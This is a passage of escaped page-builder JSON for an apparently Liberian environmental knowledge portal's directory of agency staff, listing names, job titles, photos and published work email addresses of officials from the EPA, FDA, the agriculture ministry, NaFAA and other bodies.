href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a 